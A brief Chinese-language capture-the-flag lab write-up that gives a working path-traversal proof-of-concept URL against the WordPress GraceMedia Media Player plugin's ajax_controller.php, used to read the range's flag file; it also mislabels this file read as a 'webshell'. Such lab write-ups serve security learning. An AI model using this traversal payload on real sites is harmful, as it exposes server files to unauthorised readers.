1.阅读靶场介绍
没有任何思路
但是以往的wordpress会出现这个玩法可以试试
话不多说,进入正题
2.启动靶场
如下图所示
3.poc
直接在路径拼接上
https://eci-2ze8vcjw8w2qm243tmn5.cloudeci1.ichunqiu.com:80/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../flag
到此就可以完成webshell了
感谢您宝贵的时间